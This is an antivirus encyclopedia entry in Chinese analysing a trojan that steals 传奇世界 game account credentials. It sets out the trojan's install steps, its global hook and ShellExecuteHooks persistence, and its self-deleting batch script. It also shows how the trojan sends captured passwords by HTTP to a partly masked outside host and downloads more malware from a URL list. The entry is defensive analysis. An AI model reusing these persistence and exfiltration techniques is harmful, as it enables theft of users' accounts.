病毒大百科

这是一个网游盗号木马。它的目标是《传奇世界》的帐号密码信息。同时，它还会下载一些恶意程序到用户电脑中执行。

病毒流程：
1读取文件尾部104个字节

2 删除文件
\FileName = C:\Program Files\Common Files\Microsoft Shared\MSINFO\SysWFGCQSJ2.dll

3 从自身查找名为“DLLFILE”的资源，加载并释放到
C:\Program Files\Common Files\Microsoft Shared\MSINFO\SysWFGCQSJ2.dll
然后再把刚才得到的104个资源写入新文件SysWFGCQSJ2.dll的尾部。

4 加载该DLL，GetProcaddress得到该DLL的两个导出函数jmpHookOn jmpHookOff
调用jmpHookOn,该函数的作用是下全局钩子，使所有进程加载该DLL。

5 注册CLSID组件
HKCR\CLSID\{DC7035B1-E435-4A65-9546-059796785F52}\InProcServer32
"(Default)" = "%Program Files%\Common Files\Microsoft Shared\MSINFO\SysWFGCQSJ2.dll"

6 添加启动项，随系统进程启动
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{DC7035B1-E435-4A65-9546-059796785F52}

7 生成bat文件删除原始程序
:try
del "D:\software\RunPE\virus.exe"
if exist "D:\software\RunPE\virus.exe" goto try
del %0

病毒所释放的SysWFGCQSJ2.dll文件的作用
DLL被加载后
1，判断当前进程是否是桌面进程，若是跳到2.

2，移动文件MoveFileExA
0006F3E8 00930128 |ExistingName = "C:\WINDOWS\system32\VerCLSID.exe"
0006F3EC 00930158 |NewName = "C:\WINDOWS\system32\VerCLSID.bak"

3 查找窗口FindWindow，若没查找，则创建一个新线程
0006F604 003F6AD4 |Class = "ListBox"
0006F608 003F6AC8 \Title = "dll_wfgCQSJ"
该线程的作用是：
1 查找窗口|Class = "ListBox"\Title = "dll_wfgCQSJ"，若没找到，则创建一个新窗口

2 加载DLLC:\Program Files\Common Files\Microsoft Shared\MSINFO\SysWFGCQSJ2.dll

3 查找窗口/Title = "ZXY_wfgCQSJ" |Class = "ListBox"，判断该窗口是否存在，若存在则发送WM_QUITE消息

4 SetWindowsHookExA设置WH_GETMESSAGE钩子，钩子回调函数的作用是：
获取用户传奇世界账号并以一下形式发送到网络
http://ftp.y***9.com/px/login.aspgameid=&password=&quyu=&mirserver=&js1=
&js1zy=&js1dj=&js1sex=
&js2=&js2zy=&js2dj=&js2sex=&zb=<<传奇世界>>附加信息

5 设置计时器，计时器回调函数的作用是，从网上下载恶意程序并执行。
恶意网址列表http://www.6***11.cn/txt/url.txt